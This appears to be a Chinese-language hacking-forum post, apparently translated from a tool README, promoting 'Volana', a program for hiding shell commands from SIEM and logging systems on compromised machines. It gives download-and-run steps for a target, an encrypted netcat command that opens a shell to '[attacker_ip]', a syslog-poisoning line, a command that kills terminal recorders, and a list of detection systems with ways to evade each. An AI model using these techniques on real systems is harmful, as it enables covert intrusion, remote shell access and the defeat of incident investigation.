Volana - Shell 指令混淆以避免偵測系統

twhackteam

Administrator
站方人員
Volana Shell 指令混淆以避免偵測系統-1.png









在滲透測試過程中,一個重要的面向是隱藏。因此,你應該在通過後清除你的蹤跡。然而,許多基礎設施會記錄命令並即時將其發送到SIEM,

volana這使得事後清理部分本身毫無用處。透過提供自己的shell 執行時間(輸入你的命令,volana 會為你執行),提供一種隱藏在受感染機器上執行的命令的簡單方法。這樣,你就可以在通過過程中清除你的蹤跡


您需要取得一個互動式shell。 (找到一種方法來產生它,您是黑客,這是您的工作!否則)。然後在目標機器上下載並啟動它。就是這樣,現在您可以輸入要秘密執行的命令

## Download it from github release<br>## If you do not have internet access from compromised machine, find another way<br>curl -lO -L <a href= " https://github.com/ariary/volana/releases/latest/download/volana " rel="nofollow"><span>https</span><span>://</span><span>github</span><span>.</span><span>com</span><span >/</span><span>ariary</span><span>/</span><span>volana </span><span>/</span><span>releases</span><span>/</span><span>latest</span><span>/</span><span>download</ span><span>/</span><span>volana</span></a><br><br>## Execute it<br>./volana<br><br>## You are now under the radar<br>volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky<br>volana » [command]<br>
volana 控制台的關鍵字:* ring:啟用環形模式,即每個命令都與大量其他命令一起啟動以掩蓋踪跡(來自監控系統調用的解決方案)* exit:退出volana 控制台

假設您有一個非互動式shell(webshell 或盲目rce),您可以使用<a href=" https://www.kitploit.com/search/label/Encrypt " target="_blank" title="encrypt"> encrypt</a>和decrypt子命令。以前,您需要使用volana嵌入式加密離子金鑰。

在攻擊者的機器上

## Build volana with encryption key<br>make build.volana-with-encryption<br><br>## Transfer it on TARGET (the unique detectable command)<br>## [.. .]<br><br>## Encrypt the command you want to stealthy execute<br>## (Here a nc bindshell to obtain a interactive shell)<br>volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"<br>>>> ENCRYPTED COMMAND<br>
複製加密的命令,並在目標機器上使用rce 執行它

./volana decr [encrypted_command]<br>## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)<br><br>
echo [command] | base64為什麼不直接用隱藏指令?然後echo [encoded_command] | base64 -d | bash

因為我們希望受到保護,免受觸發base64使用警報或在命令中尋找base64 文本的系統的影響。我們也想讓調查變得困難,而base64 並不是真正的阻礙。

請記住,這volana不是讓你完全隱形的奇蹟。它的目的是讓入侵偵測和調查變得更加困難。

偵測的意思是,如果某個指令被執行,我們是否能夠觸發警報。

volana只會捕獲啟動命令列。🧠但是,透過在執行之前添加空格,預設的bash 行為是不保存它

  • 基於歷史命令輸出的偵測系統
  • 基於歷史文件的檢測系統
  • .bash_history, “.zsh_history” 等等..
  • 基於bash 調試陷阱的檢測系統
  • 基於sudo 內建日誌系統的偵測系統
  • 檢測系統追蹤系統範圍內所有進程的系統呼叫(例如opensnoop)
  • 終端機(tty)記錄器(script、、、等等)screen -L sexonthebash ovh-ttyrec
  • 易於檢測和避免:pkill -9 script
  • 並非常見情況
  • screen有點難以避免,但它沒有記錄輸入(秘密輸入:stty -echo=> 避免)
  • 可以volana透過加密來避免命令檢測
  • 對未知指令發出警報的偵測系統(volana one)
  • 基於鍵盤記錄器的偵測系統
  • 容易避免:複製/貼上指令
  • 並非常見情況
  • 基於syslog 檔案的偵測系統(例如/var/log/auth.log)
  • 僅適用於sudo或su命令
  • syslog 檔案可能會被修改,從而按照你的意願被毒害(例如/var/log/auth.log : logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • 基於syscall 的偵測系統(例如auditd、LKML/eBPF)
  • 難以分析,透過多次轉移系統呼叫可能會變得不可讀
  • 自訂LD_PRELOAD注入來製作日誌
  • 這不是常見的情況
抱歉,標題太吸引人了,但我們不會為貢獻者提供任何報酬。🐛

如果您發現以下情況請告訴我: * 一種檢測方法volana* 一種監視不檢測volana命令的控制台的方法* 一種避免檢測系統的方法

在此報告


下載Volana
 
返回
上方